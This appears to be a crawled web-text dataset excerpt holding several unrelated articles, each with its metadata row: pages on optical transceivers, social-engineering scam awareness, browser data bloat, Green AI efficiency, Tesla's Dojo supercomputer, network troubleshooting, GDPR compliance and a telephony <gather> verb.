As the leading innovation and R&D lab for the cable industry, CableLabs creates global impact through its member companies around the world and its subsidiary, Kyrio. With a state-of-the art research and innovation facility and collaborative ecosystem with thousands of vendors, CableLabs delivers impactful network technologies for the entire industry. | <urn:uuid:a1ac04cf-62ce-4e41-9359-d7ccd5a6e31e> | CC-MAIN-2022-40 | https://www.cablelabs.com/news/faster-cellular-signals-mean-slower-wi-fi | null | s3://commoncrawl/crawl-data/CC-MAIN-2022-40/segments/1664030336921.76/warc/CC-MAIN-20221001195125-20221001225125-00202.warc.gz | en | 0.929841 | 186 | 2.515625 | 3 |
An optical transceiver can best be described as a device that converts high-speed data from a cable source to an optical signal for communication over optical fiber. Optical transceivers are used to update the communications networks to manage broadband, to update the data center networks to make them manage traffic with higher speeds, to implement the backbone network for mobile communications.
For transceivers that plugs into Gigabit Ethernet and links to a fiber optic network, the Gigabit Interface Convertor is the standard and SFP is for small form factor pluggable transceiver. The GBIC Modules operates as an input and output transceiver and is linked with the fiber optic network generally through the optic patch cords. GBIC transceivers are deemed to be ideal for any interconnections over the Gigabit Ethernet centers and for switches environment. The converters are virtually intended for high performance and continuing interactions that have need of gigabit or fiber channel interconnections. From SFP, users are able to generate connections utilizing the multi or single mode fiber optic ports along with the copper wiring.
The GBIC transceiver and the Cisco SFP offer companies with the opportunity to set up a Fiber Channel and Gigabit Ethernet connection effortlessly within their network. However, many Cisco GBIC transceivers would be the Cisco GLC-SX-MM, GLC-T, GLC-LH-SM, GLC-ZX-SM, and so much more. There are also 155M/622M/1.25G/2.125G/4.25G/8G/10G SFP optical transceivers, among which 155M and 1.25G are used widely on the market.
GBIC, SFP, SFP+, SFP, 1×9 covers low rate to 10G products, and is fully compatible with the global mainstream vendor equipment. And SFP+ Module technology is becoming mature, with rising trend development of demand. 10G SFP optical module has been through development of 300Pin, XENPAK, X2, XFP, ultimately achieving to transmit 10G signals by the same size with SFP, and this is SFP+. SFP+, by its virtue of small size and low cost, meets the high-density requirements of devices to optic modules. Since 2010, it has replaced XFP and become the main stream in 10G market.
The SFP+ modules support digital diagnostics and monitoring functions, which are accessed through a 2-pin serial bus and provide calibrated, absolute real-time measurements of the laser bias current, transmitted optical power, received optical power, internal QSFP transceivers temperature, and the supply voltage. Digital diagnostic functionality allows telecommunication and data communications companies to implement reliable performance monitoring of the optical link in an accurate and cost-effective way.
Optical transceiver market driving forces relate to the increased traffic coming from the Internet. The optical transceiver signal market is intensely competitive. There is increasing demand optical transceivers as communications markets grow in response to more use of smart phones and more Internet transmission of data. The global optical transceiver market will grow to $6.7 billion by 2019 driven by the availability of 100 Gbps devices and the vast increases in Internet data traffic.
A palette of pluggable optical transceivers includes GBIC, SFP, XFP, SFP+, X2, CFP form factors are available at FiberStore. These are able to accommodate a wide range of link spans. The 10Gbps optical transceivers can be used in telecom and datacom (SONET/SDH/DWDM/Gigabit Ethernet) applications to change an electrical signal into an optical signal and vice versa. | <urn:uuid:a81891d5-e47d-44b7-96a6-36ecf12922d0> | CC-MAIN-2022-40 | https://www.fiberopticshare.com/pluggable-fiber-optic-transceivers.html | null | s3://commoncrawl/crawl-data/CC-MAIN-2022-40/segments/1664030336921.76/warc/CC-MAIN-20221001195125-20221001225125-00202.warc.gz | en | 0.920445 | 762 | 2.640625 | 3 |
Social engineering is a new name for an old con-artist trick. In this scam, a fraudster tries to gain your confidence by convincing you they are someone they are not, in order to get personal information from you.
What to Look For
These con artists can approach you by phone, email, text or social media. Here are some of their usual tricks:
- Claim to be a friend or family member in trouble
- Pretend to be a company threatening to shut down an account or service
- Pretend to be a company with a great discount offer or verifying account information
- Claim to be a collection agent working on behalf of a government agency or company
How to Help Protect Yourself
You can help protect yourself from social engineering by remembering these things:
- Be skeptical.
- Only give out information if you made the call to a number you know is right.
- If you think it’s a scam, hang up or delete the message. And don’t try to outsmart the bad guy by intentionally giving out wrong information. Just hang up. If you want to see if it was a real call or offer, contact the company by using information published on the real company website.
- Do not click on a link provided by an email or text message.
If you think a caller is trying to scam you, hang up. If you get a suspicious email or text, do not reply. If you suspect you are a target of fraud on your AT&T mobile phone account, you can report it to our Fraud team here. If you suspect fraud on another account, call the customer service number on your bill for help.
To find out more about reporting fraud, check out our Resources page. | <urn:uuid:83562019-9e03-4eee-86f9-cffe84968342> | CC-MAIN-2022-40 | https://about.att.com/pages/cyberaware/ae/se | null | s3://commoncrawl/crawl-data/CC-MAIN-2022-40/segments/1664030337398.52/warc/CC-MAIN-20221003035124-20221003065124-00202.warc.gz | en | 0.920114 | 359 | 2.515625 | 3 |
Francesco Giarletta, CEO of Avanite, examines the potential security issues that simple web browsing data can cause and how web data bloat can be reduced
Whenever a user visits a website, data is created, downloaded, and stored. Some of this data is useful; it enables us to get the rich browsing experience we expect from the sites we visit. But as web sites and web applications become increasingly connected and complex the amount of browsing data also grows, quickly reaching a point where computer performance is impacted. What’s more, that data in browsing databases can include highly sensitive information putting organizations security at risk.
Of course the issue of the web data is as old as the internet itself, so it would be perfectly reasonable to question why this is now an issue. So how -and why – has the web browsing data problem evolved into not only a potential risk to IT performance but also organisations privacy?
Inconvenience to impacting performance
While web data has always been a potential inconvenience to users and organisations it started to become a bigger problem when Microsoft introduced Windows 8.0 and Internet Explorer 10. At this point the computing behemoth introduced the webcachev01.dat database, a central store for all web data, such as cookies and browsing history. In addition to acting as a central data repository for Microsoft browsers, it also collects data from any application which uses the WinInet subsystem for internet communications, such as Windows store apps and Windows Explorer.
The database spawns at 32MB and as users use the system it grows with new data. Files of multiple Gigabytes are not uncommon, so the capacity to store all that data can directly impact user experience, with problems such as prolonged log-on times, while also utilising a growing amount of IT infrastructure resource, and associated costs.
Where data grows, security threats follow
But the problem doesn’t stop there as the data collection goes far beyond a record of websites visited. It can also can include information such as usernames, passwords, and account numbers. Furthermore many websites prompt user to remember login credentials, which, when opted for, stores an authentication cookie on the machine. This makes it possible for hackers steal or copy these authentication cookies and user logins, enabling them to gain access to sites, such as the CRM or any other cloud based software-as-a-service application, as a verified user without being prompted to provide any credentials.
You can’t walk out
And it isn’t just the Microsoft browsers that create these issues. While browsers such as Google Chrome and Mozilla Firefox do not use WinInet, they do utilise their own proprietary code and databases that perform many of the same actions. And as web sites and web applications become more complicated, compatibility issues also start to occur, forcing businesses to install multiple browsers for their users, exacerbating the data bloat and performance problem further.
The final complication to this issues is that much of this web data, along with other personal settings such as email signatures etc, is usually stored in user profiles. This in turn creates further data bloat and performance issues, particularly when users login to a roaming or virtual environment.
Addressing the web data challenge
So with the challenges associated with web data bloat unlikely to go anywhere soon what can organisations do to address the problem? Let’s take a look at the pros and cons of the standard options that organisations can implement.
Option one – keep all web data
Continuing to keep all web data will ensure that users have a rich browsing experience, ensuring their expectations of websites and web apps are met. However, not only will steps have to be taken to secure that data, the administrator will also be faced with a requirement for increased back-end storage.
For instance, in a business of 1000 users with an average web data size of 250MB per user an extra 250GB of storage will be required. And if all users log on at 9am this 250GB needs transferring to the users which places strain on the network. All of this affects the user in the way of performance. Login times are massively affected (customers have reported up to 90% of the time taken to log on is down to web data), browser launch times increase, as does the rendering of web pages which, in some extreme cases will time out, impacting productivity.
Option two – delete the data each time
By deleting all web data after each session organisations will remove the impact on logon, storage, and network while addressing concerns around data security. However, this effectively means that for each logon the user will be starting from scratch as far as internet applications are concerned.
Useful browser items such as history and cookies, many of which will be authentication cookies, which are used to recognise users on websites such as AWS and Office365 are not immune and are also lost. So while the issues of bloat and privacy are removed, problems around user experience and productivity remain.
Option three – disallow third party cookies
A further option is to utilise the ‘disallow third party cookies’ setting that all browsers include. This will stop the majority of the “undesired” cookies being stored but might also stop certain website features from operating correctly. As such, by enabling this, all of the issues (performance, security, user experience) would be partially but not fully addressed.
Option four – create whitelists and blacklists
Finally organisations could choose to whitelist and black list certain types of web data. By identifying business applications and websites and “whitelisting” them, while blacklisting problem websites and applications, they can ensure that only data that is relevant to business as usual activity is retained. However, much like disallowing third party cookies, this only partially addresses the issues rather than providing a solution to them.
A new approach to web data bloat
It’s clear that the standard options available all come with a catch – either a rich browsing experience with web bloat and possible privacy issues, or a lean data footprint with quick loading times that’s hampered by browsing and compatibility issues. As such what is needed is a solution that completely manages all aspects of web data, offering organisations the opportunity to strike a balance which best suits their specific requirements.
To achieve this IT teams need a solution that is able to analyse the data generated by simple web browsing and web based applications. By being able to see what data is present on PCs and servers, they can begin to understand what category – desirable and undesirable – that web data falls into, while also assessing the savings in disk space and storage that can be realized by addressing the issue.
With this visibility of the web browser data that resides in the network and the issues it is creating, it then becomes possible to remove unnecessary data. This will not only reduce the size of users’ web browser databases, but will also provide administrators with full control over users’ browsing data to ensure that only required information is kept. In our experience this can reduce the size of WebCache files by 80 to 90%, and the number of cookies in a typical WebCache from typically 5,000 or more to a few hundred.
As cloud and web applications become increasingly prevalent in the IT environment, it’s critical that organisations adapt their practices to ensure that this new plethora of data doesn’t impact performance, security or the user experience. And this can only be achieved once they have not only the ability to gain full visibility of web data but also the capability to manage – and delete it – effectively. | <urn:uuid:e0bba3ad-bbb1-4fb7-9178-b494073ffa64> | CC-MAIN-2022-40 | https://informationsecuritybuzz.com/articles/bringing-visibility-to-the-issue-of-web-data-bloat/ | null | s3://commoncrawl/crawl-data/CC-MAIN-2022-40/segments/1664030337504.21/warc/CC-MAIN-20221004121345-20221004151345-00202.warc.gz | en | 0.931373 | 1,551 | 2.6875 | 3 |
Moving from Red AI to Green AI, Part 1: How to Save the Environment and Reduce Your Hardware Costs
Machine learning, and especially deep learning, has become increasingly more accurate in the past few years. This has improved our lives in ways we couldn’t imagine just a few years ago, but we’re far from the end of this AI revolution. Cars are driving themselves, x-ray photos are being analyzed automatically, and in this pandemic age, machine learning is being used to predict outbreaks of the disease, help with diagnosis, and make other critical healthcare decisions. And for those of us who are sheltering at home, recommendation engines in video on-demand platforms help us forget our troubles for an hour or two.
This increase in accuracy is important to make AI applications good enough for production, but there has been an explosion in the size of these models. It is safe to say that the accuracy hasn’t been linearly increasing with the size of the model. The Allen Institute of AI, represented by Schwarz et al in this article, introduces the concept of Red AI. They define it as “buying” stronger results by just throwing more compute at the model.
In the graph below, borrowed from the same article, you can see how some of the most cutting-edge algorithms in deep learning have increased in terms of model size over time. They are used for different applications, but nonetheless they suggest that the development in infrastructure (access to GPUs and TPUs for computing) and the development in deep learning theory has led to very large models.
The natural follow-up question is if this increase in computing requirements has led to an increase in accuracy. The below graph illustrates accuracy versus model size for some of the more well-known computer vision models. Some of the models offer a slight improvement in accuracy but at an immense cost of computer resources. Leaderboards for popular benchmarks are full of examples of Red AI where improvements are often the result of scaling processing power.
Here, model size is measured by the amount of floating-point operations. As you can see above, the bigger models are more accurate on average, but some of the smaller models (ResNet and FE-Net most prominently) are almost on par in terms of accuracy.
Why should you care? Because model size poses a cost for whoever is paying for your infrastructure, and it also has implications for our environment, as the computational needs of bigger models drain more power from our infrastructure.
To illustrate the energy needed in deep learning, let’s make a comparison. An average American causes a CO2 footprint of 36,000 lbs in one year, while the deep learning Neural Architecture Search (NAS) model costs approximately 626,000 lbs of CO2. That’s more than 17x the average American’s footprint in one year. Furthermore, it costs somewhere between $1 and $3 million in a cloud environment to train. The Natural Language Processing (NLP) model BERT costs approximately 1,400 lbs of CO2 (4% of the average American) and somewhere between $4,000 to $12,000 to train in the cloud.
How can we shift from Red AI that is inefficient and unavailable to the public to efficient and democratic Green AI?
1. Get your power from a renewable source
Needless to say, anything is green if it is powered by something renewable. However, even if your power is from a renewable source, doing unnecessarily power-consuming model building may lead to you using energy that could have been put to better use elsewhere.
2. Measure efficiency, not only accuracy
Machine learning has been obsessed with accuracy — and for good reason. First of all, if a model isn’t accurate enough for what you want to use it for, it can’t be put into production. Second, accuracy is easy to measure, although there are many ways to do it and sometimes it’s hard to prove that the result you obtain is really an unbiased estimate on real-life performance.
Also easy to measure but often overlooked is the resource cost it takes to build a model and to get predictions from it. This comes in many versions, such as time or energy required to train the model, time or energy required to score new data (“inference”), as well as model size (in megabytes, number of parameters, and so forth). Schwarz et al have a comprehensive discussion on which of these metrics are the best, and I recommend their article on this topic. As a hardware-independent metric, they recommend the amount of floating-point operations (FLOPs) to measure model size. However, this can be difficult to retrieve from whatever software you use to build models.
In a green machine learning study from Linköping University, a combination of accuracy and resource cost is proposed as a way to measure efficiency, with citations from other literature on the topic and summarized for convenience. All efficiency metrics derive from this logic:
These are various examples the study mentions:
Let’s examine what happens if we apply these metrics to our above computer vision models.
In the graph below, you see that if you divide accuracy with the number of floating point operations (a measure of computing resources), you get the “Model Size Efficiency” as defined above. In this case, that question is, “how many percentage points of accuracy do you get for each billion floating-point operations in it?” Compare it to the previous graph, and you see that the highly accurate SENet and NASNet are actually the least efficient.
However, one must remember that in the scoping of a machine learning project, an acceptable accuracy should be discussed, (i.e., how accurate does the final model need to be? And how fast can it make predictions?). Many things need to be considered jointly before selecting a final model. If the most efficient model in your case would have been the SqueezeNet, it should also be noted that it is, at least in the case above, significantly less accurate than some much larger models. Is this acceptable? That depends on your use case.
Earth Day is a good time for the machine learning community to think about factors other than accuracy, such as efficiency. When the goal is to improve model accuracy, can we consider other approaches besides throwing megatons of computing at the problem? The real progress would be to make that improvement while balancing the use of our resources. To better quantify this, we have developed methods to measure efficiency. For us, we believe in using efficiency metrics in machine learning software.
On April 22nd, I’m holding a webinar on green machine learning, where we’ll take an in-depth look at theoretical and practical ways to improve efficiency in machine learning. Join us. And if you cannot do that, watch this space for a future blog post with some tips and tricks. | <urn:uuid:63f216d9-5572-4dad-a362-93fb0344f620> | CC-MAIN-2022-40 | https://www.datarobot.com/blog/how-to-save-the-environment-and-reduce-your-hardware-costs/ | null | s3://commoncrawl/crawl-data/CC-MAIN-2022-40/segments/1664030337668.62/warc/CC-MAIN-20221005203530-20221005233530-00202.warc.gz | en | 0.954483 | 1,421 | 2.828125 | 3 |
Elon Musk has been hinting for a couple of years that they were developing their supercomputer. At Tesla's AI Day, Tesla announced the arrival of Dojo, its supercomputer designed entirely in-house.
Dojo is a supercomputer by virtue of its complexity and speed but differs from other supercomputers in quite a few ways. But it's not technically a supercomputer yet because it hasn't been entirely built out.
Tesla's Senior Director of Autopilot Hardware, Ganesh Venkataramanan, is the head of the project and was the point-person for the presentation.
The heart of the design is the Dojo D1 chip, which provides stunning bandwidth and compute performance. Tesla found existing computer platforms lacking for their primary problem to solve: developing self-driving technology by training its massive neural networks, but they also hinted they might provide Dojo to others developing AI in the near future.
Tesla's motivation for Dojo springs from a massive amount of video data captured from over their large fleet of existing vehicles, which it uses to train its neural nets. Tesla was not satisfied with other HPC (High-Performance Computing) options for training its computer vision neural nets and decided they could create a better platform.
It's unusual for a supercomputer to be designed for just one problem. Whether its design is general-purpose enough to be suitable for other industries and applications, time will tell if it can be used for different applications, particularly deep learning, optimization simulation and NLP.
Existing supercomputers are more general-purpose than Dojo. HPC (High-Performance Computing, another name for supercomputers) are optimized for very complex mathematical models of physical problems or designs, such as climate, cosmology, nuclear weapons and nuclear reactors, novel chemical and material compounds, support for pharmaceutical research and cryptology.
Just for historical reference, the first supercomputer was the 1964 Control Data Corporation 6600, capable of executing 3 million floating-point operations per second (FLOPS). Fast forward to 2020, and the PlayStation 5 has hardware capable of up to 10.28 teraFLOPS, roughly three million times faster. But the fastest supercomputer today is clocked at 450 petaFLOPS, ten thousand times faster than the Playstation and Tesla claims Dojo will reach exascale: an exaFLOP is one quintillion (1018) double-precision floating-point operations per second. I can't be sure this is real or hype, because below we'll dig into some complex data that brings Dojo far below exascale.
There is also some controversy about how Dojo is measured. According to the TOP500 list compiled twice per year "Fugaku" in Kobe, Japan, holds the #1 as the undisputed fastest supercomputer in the world with a demonstrated 442 petaFLOPS (it is widely believed that Fugaku is just getting starting and could exceed an exaFLOP in its current configuration). This is a staggering three times faster than the #2 entrant, "Summit," at the Oak Ridge Laboratory in Tennessee, with a top speed of 149 petaFLOPS. Dojo, with its 68.75 petaFLOPS (approximately), would then be in 6th place. Because the next three supercomputers are pretty close at 61.4 to 64.59 petaFLOPS, Dojo may be in seventh, eighth or even ninth place.
The top supercomputers today cost $500 million or more, often take two 5,000 square foot buildings. They are designed to process very complex mathematical calculations at scale, so it wouldn't make sense to be built for a single application.
While the top 10 or so are devoted to defense and intelligence applications, at least a third of them on the TOP500 list are dedicated to healthcare, and many support crucial drug-related research. There are two supercomputers that I know of that are used in a private enterprise setting, one in an oil- and gas-related study. It is no secret that most of the most powerful ones are used for nuclear weapons research and cybersecurity in the US, EU, Russia and China, and possibly others (although it has been made available for studying COVID-19). Others have advanced the science in weather and climate in significant ways. Some examples are:
- Cambridge-1 - the fastest supercomputer in the UK. was designed and assembled by Nvidia and was clocked at 400-petaFLOPS. It is applied to medical research (as far as we know).
- Summit, the aforementioned IBM-designed computer at the Oak Ridge National Laboratory (ORNL), is currently the fastest supercomputer in the US. Still, its 148.8 petaFLOPS will be eclipsed in 2022 by three computers provided by HPE/Cray. With 4,356 nodes, each with two 22-core Power9 CPUs and six Nvidia Tesla V100 graphics processing units (GPUs). It is already obsolete. It weighs a staggering 340 tons. And will be decommissioned and cut up for scrap to make way for a new exascale computer. This begs an important quest: will Dojo show significant miniaturization and power coemption?
Summit and the other HPC "elephants" get their performance by scaling. The design of the chips, the creation of the nodes, the configuration, and of course, the interconnect are all necessary, but 200 quadrillion FLOPS, 250 petabytes of data is achieved by volume. It requires 20-30MW of electricity to run, enough to light a small town.
Summit's "sister" computer was installed at Lawrence Livermore National Laboratory in California. Sierra is air-gapped and applied to predictive applications in nuclear weapon stockpile stewardship, a US DOE program for simulating and maintaining nuclear weapons.
Scrutinizing Tesla's Dojo
Tesla has not developed Dojo from commodity components. It created a unique architecture and several chip designs that were produced, most likely, by Samsung.
For example, instead of using multicore chips connected to motherboards, they use the entire wafer (chips are produced on a wafer and cut out separately.) Tesla claimed that the number of GPUs is more than the top 5 supercomputer(s) in the world, but this is a misstatement. They meant that it has more GPUs than the FIFTH fastest supercomputer in the world, Selene, which has 4,480 NVIDIA V100 GPUs.
Andrej Karpathy, Senior Director of AI at Tesla, revealed in a presentation that the largest cluster is made up of NVIDIA's new A100 GPUs, which would put it in the 5th position in the world, but some are fudging on these figures. An FP32 performance metric measures how many single-precision floating-point operations per second the machine can produce. Typical measures for supercomputers are F64, double-precision floating point calculations. There was some confusion in the presentation about which metric was used.
Whether Tesla was able to produce such a powerful computer is not nearly as interesting as what they intend to do with it. It remains to be seen if Dojo is a new architecture for supercomputers, exceeding the characteristics of the current ones in production, or a one-off device for their application. We don't know just how clever Dojo is yet.
Telsa could potentially make Dojo the new most powerful supercomputer in the world. But if that's Tesla's plan, they have their work cut out for them. The history of computing is littered with technical breakthroughs that didn't achieve market traction, much less dominance. As General George Patton once said, "No good decision was ever made in a swivel chair." The same holds true for tech. Press conferences don't amount to field victories. Tesla's HPC field victory has not yet been achieved. | <urn:uuid:b56c2800-5633-4262-972b-a22d9bb75687> | CC-MAIN-2022-40 | https://diginomica.com/teslas-dojo-supercomputer-sorting-out-fact-hype | null | s3://commoncrawl/crawl-data/CC-MAIN-2022-40/segments/1664030335326.48/warc/CC-MAIN-20220929065206-20220929095206-00402.warc.gz | en | 0.958569 | 1,631 | 3.125 | 3 |
The process of troubleshooting of a network holds great significance to ensure the smooth functioning of all the processes. It makes sure that all the problems are eliminated from the system and there are no further issues that may cause a hindrance. However, the troubleshooting methodology involves a number of steps which should be carried out in a professional manner. Only an expert at this process will be able to figure out the issues with the network and devise ways to eliminate them. However, one needs to have in-depth knowledge and a good deal of command on the concepts of networking in order to be fluent in the process of troubleshooting.
There is a well-traced plan of action which has to be followed in this regard. There are some steps which the troubleshooter has to follow in the given order as it will make his task much easier and less complicated. Below, you will find the whole process which is involved in the troubleshooting methodology. Just by following all of these steps in the prescribed order, you will easily be able to troubleshoot any network out there.
The first and most basic step which is involved in the process of troubleshooting is the identification of the problem. It is not possible to devise a solution without knowing the exact issue which might have occurred with the network. The best way to go about this process is to identify the symptoms and then narrow down the problems which could be responsible for it. In this regard, there are four steps which help you to identify the problem which might have occurred with the system.
Information Gathering: In this step, you have to gather information regarding any physical problems which might have caused this issue. In this regard, you first need to make sure that all the wires are connected in the appropriate places. You can verify this by checking the light on the Network interface card. If the light is still, this means that the connection is established and if it is blinking then it means that the transmission of traffic is also perfect.
Identify Symptoms: In this step, you need to figure out any symptoms which the problem is showing. For example, in this regard you can type ipconfig/all to figure out if your computer is connected to the DHCP server and not to any other server which could cause issues.
Question Users: The next step which you will take is to question all other people in the network place regarding this problem. You need to determine whether only you are the one who is having this problem or there are others as well. If it is only you, then the problem might be with your own computer settings, maybe. However, if others are also experiencing this problem, then it might be on a large scale.
Determine if anything is changed: In this step, you have to find out if there is anything which has changed and could be a cause of your problem. For example, if the whole system was going through a process of updating or maintenance. If you find out that this is the case, then you could devote your thoughts toward this issue now in order to troubleshoot the problem.
Based on the information which you have gathered till now, you move a step further. For example, if you think that the problem which you are facing is due to the computers having an APIPA address instead of a DHCP address, you should try to have a look at this issue in depth.
Question the obvious: So, this is the step where you will devote your energies to confirm you narrowed-down problem. For example, in the case of loss of a DHCP address, you can type ipconfig/renew on the computer to check if the DHCP address is restored. If it is not restored, then it means that the DHCP server for that computer has not been put online yet. This will let you relate all your previous findings in order to think about a common problem which could have caused it.
So now you have established a theory which might be the problem with the network. Now you need to confirm this theory to make sure that you further devote your energies towards it. Meanwhile, you can also provide some temporary solution to this problem. For example, in the case of lost DHCP servers, you can assign the servers to the computers manually. However, this would be just for a short time. You main task will be to confirm the cause of this problem and start working on it.
Once theory is confirmed, determine next steps to resolve problems: So now you know that your theory has been confirmed and you will have to find the best possible solution for it. In this regard, you will figure out the steps which you will have to follow to resolve the issue. If the issue is big and requires administrator permissions, you should refer the issue to the senior network administrator so he could make sure it is eliminated in the least amount of time. However, if the problem is related to something which you can solve yourself, then you should start to form a plan of action for finding the solution.
If theory is not confirmed, re-establish new theory or escalate: In case you find out that your theory did not develop and the issue which you were looking at is not a cause of this problem, then you should consider starting all over again. You will have to go to the first step and do all of the processes again until you finding the correct reason of the problem faced by the network.
So once you have confirmed your theory and figured out the cause of the problem, it is time that you start to make a plan to eliminate the issue. You should devise the most feasible plan which could enable you to troubleshoot this problem in the least amount of time and with the best output. For example, in case of the problem with DHCP servers, you can find ways in which you can put the servers back online. You can do this by either manually allocating the servers to computers or requesting the senior administrator to do it. You will have to consult to some other documents relating to the system in order to devise the perfect plan of action. These documents could comprise of device manuals, computer manuals and online forums. You might also consult other technicians in this regard as well.
Once you have figured out the whole plan, you will also need to figure out the immediate effects that this change will have one the system. In this regard, you should know that what changes will take place with the computers on the network and how will you be able to judge if this problem has been resolved. In addition to this, you need to make sure that your whole plan is perfect and suitable to the situation before you move on to the implementation of the plan.
After you have successfully figured out a plan of action, it is time for you to implement the plan. There are generally two ways at this point for you from which you can opt for the most desirable one. Either you can proceed with you plan or you can hand over the process to a more technical person. You usually hand over the process to someone else if you think that you will not be able to carry with the process of implementation as it does not lie under your domain. Under these conditions, you can forward the case to the senior administrator which will then take the responsibility for the process of implementation.
However, if you feel that you can do the process of implementation by yourself, you should go for it. The most favorable process to go about implementation is to break all the larger processes into smaller and simpler tasks which will enable you to manage easily and independently. You then carry out this process by implementing all the steps one by one. You can also gather all the steps which can be implemented at the same time in order to save your time. However, if any of the steps is not implemented correctly, you should do it again to make sure that the output is perfect. Sometimes, you may also need to involve another technical person in this process if you feel the need to do it. Once you perform these steps, you are done with the process of implementation.
After the process of implementation, you have to make sure that your system is perfect to use. The whole process which you did above would be useless if the system does not work perfectly after it and the problem is resolved. In order to confirm that you have eliminated the problem, you will have to check the system and perform all of the functions and test if they work fine. By verifying full system functionality, you will ensure that you have not created another problem while trying to eliminate one problem. In this regard, you might also have to take certain preventative measures if required. It would also be a good idea to let the customer verify full system functionality and make sure that the system is now perfect to work.
However, if you feel that there is still some problem with the system, you will have to carry out the process of troubleshooting again and ensure that the problem is identified and eliminated. Once you finish this last step, you will have successfully carried out the process of troubleshooting the network.
There is an additional step after the implementation of the solution. This process ensures that whole of the process is documented and stored. This helps other people to consult this documentation if any similar problem arises with the network. In fact, it might also aid you in the future when you are performing another troubleshooting process. This documentation will basically comprise of three different components.
Firstly, you will write down the whole process which you used to find the problem. This will involve all the steps starting from the identification of the problem to confirming it. Secondly, you will also have to document all of your actions. This means that you will explain in detail all the steps which you used to eliminate the problem. You will also have to explain what outcomes you got and how successful they were. Lastly, you will have to describe which components you used while performing this process. The description of each component along with its relevance to the problem is also quite essential. Once you have completed this documentation, you are done with the whole process!
We have discussed in detail all the steps which one should take in order to troubleshoot a network. It is interesting to note that the whole process can be divided into smaller and simpler steps to provide ease and improve the final output. All of the processes should be done in the order which has been prescribed. However, the process is not as simple as it looks. One needs to have a detailed knowledge regarding the working of the systems in order to figure out the problems. In fact, the identification of the problem is the most difficult task. The process becomes much simpler if the problem has been identified, as now you just have to devise ways to eliminate it. You should also make a note of the fact that you will have to consult various documents, online resources or other technicians in order to aid you in the whole process. If you just understand all of the steps mentioned, you will be able to master the process of network troubleshooting.
SPECIAL OFFER: GET 10% OFF
Pass your Exam with ExamCollection's PREMIUM files!
SPECIAL OFFER: GET 10% OFF
Use Discount Code:
A confirmation link was sent to your e-mail.
Please check your mailbox for a message from firstname.lastname@example.org and follow the directions.
Download Free Demo of VCE Exam Simulator
Experience Avanset VCE Exam Simulator for yourself.
Simply submit your e-mail address below to get started with our interactive software demo of your free trial. | <urn:uuid:cedba8b2-b2f2-4c2a-b7f9-ea3f2f2a21c0> | CC-MAIN-2022-40 | https://www.examcollection.com/certification-training/network-plus-network-troubleshooting-methodology.html | null | s3://commoncrawl/crawl-data/CC-MAIN-2022-40/segments/1664030335491.4/warc/CC-MAIN-20220930145518-20220930175518-00402.warc.gz | en | 0.965522 | 2,330 | 2.640625 | 3 |
GDPR is meant to be complied with by each data controller and data processor within the European Union (EU)
GDPR is meant to be complied with by each data controller and data processor within the European Union (EU), as well as by entities that manage information regarding living EU residents or nationals. A data controller is any organization that defines the purposes and procedures for personal data processing, while a data processor is any company that handles personal data on behalf of the data controller.
The primary aim of the regulation is to protect individual data, which can be classified in two categories: ‘personal data’ and ‘sensitive personal data’. The first group includes emails, physical addresses, IP addresses or any other information that can help to identify a user, while the latter covers information related to health, biometric and genetics.
The main principles of GDPR are concerned with guaranteeing transparency in data processing, fairness in the matchup between data processing and its description and adequacy regarding the relevancy of the information and in ensuring that it is limited to what is necessary in relation to the purposes for which the data are being processed.
The organization is required to remain proactive, developing a plan to prevent and detect a data breach and to evaluate, on a periodic basis, the effectiveness of security practices, while keeping records on performance to establish a path to continual improvement.
The aim of GDPR is to cover all IT systems, including network, endpoints and mobile devices. However, it is a priority to define a catalogue of assets in which personal data are processed or stored.
It is important to identify what devices process or store sensitive data, including cloud services and devices under the Bring Your Own Device (BYOD) policy.
Article 30 from GDPR requires the institution to keep records of the maintenance of processing assets and activities under its responsibility.
The SOC provides a facility or service for managing information security events, through which companies can monitor all user and system activity to identify malicious or suspicious behaviour for all assets within its scope, centralizing all logs from applications, systems and network, and linking every alert to detect any undesirable activity in a proactive way.
The information gathered can be used to investigate the root cause of a security incident by determining the attack method through a forensic analysis procedure.
IT security assessments should be performed on a periodic basis to detect vulnerabilities that need to be resolved. Once a vulnerability has been detected, it is necessary to consider different issues as to how so many personal records were exposed, and whether the vulnerability has been exploited or whether there has been an attempt to exploit it.
Finally, the detected vulnerabilities require a planned solution that will resolve the vulnerability efficiently, while ensuring that records are kept on the solutions developed and deployed.
Article 35 of the GDPR requires the performance of a Data Protection Impact Assessment (DPIA) or similar procedures, while article 32 requires the organization to deploy the security measures that appropriate to protecting the personal data aligned with the detected risks.
Alignment with IT Security frameworks such as ISO/IEC 27001:2013, and even certification, can provide a wider view on risk assessment.
There are other IT security frameworks that could be helpful, such as NIST, PCI DSS, COBIT, among others.
Article 32 of the GDPR provides guidance on tests, assessment and the evaluation of the effectiveness of measures for ensuring the security of data processing.
Suggested procedures to measure the effectiveness of security controls include:
It is mandatory to plan detection and response to a potential data breach in order to minimize its impact, providing a quick and effective incident management procedure.
The incident response plan should include detection, analysis, contention and mitigation procedures. These steps, are to be established on a timeline and should be planned.
Those procedures should be tested and measured regularly, as part of a continuous improvement approach.
When a data breach succeeds, the organization needs to report to the regulatory body within the first 72 hours of becoming aware of the incident. However, high-risk incidents should be reported immediately, as article 31 of the GDPR article states.
This notification should include a description of the breach, the Data Protection Officer’s (DPO) contact details, the possible consequences of the breach and the measures deployed or planned to address the breach and mitigate its negative effects.
In relation to the previous step, the incident response plan needs to be tested and measured regularly, with the aim of achieving continuous improvement.
Are you ready for GDPR compliance? Tell us how you plan to achieve compliance and how you plan to address these and any other issue that may arise. Contact us if you need further help, we will be happy to hear from you and help you. | <urn:uuid:b5ec9ade-0570-4c5b-aa62-ad6cda1250d8> | CC-MAIN-2022-40 | https://ackcent.com/seven-tips-for-compliance-with-the-general-data-protection-regulation-gdpr/ | null | s3://commoncrawl/crawl-data/CC-MAIN-2022-40/segments/1664030336978.73/warc/CC-MAIN-20221001230322-20221002020322-00402.warc.gz | en | 0.938042 | 958 | 3.234375 | 3 |
Role: <gather>, in simple words collects the user response as the user makes their choice by pressing the keys on the dial pad.
Use: The main use of <gather> is to collect the digits as the user enters them from their phone. Some of the examples stating how gather can be used are :-
- IVR – When building an IVR for your company <gather> collects the digits that the user enters to direct the call to correct department/individual.
- Conference – When joining a conference caller enters the “pin”. This pin is collected by <gather> for validating the user.
- Authentication – Yet another way of using <gather> for security authentication when accessing personal or secured information over phone.
While there are no limitation on where <gather> can be used, there definitely is requirement or set of attributes to use with <gather>. Below is a list of attributes to be used with <gather>, each attribute has a specific function and can use certain values.
|Timeout (in seconds)||Integer||4 Seconds|
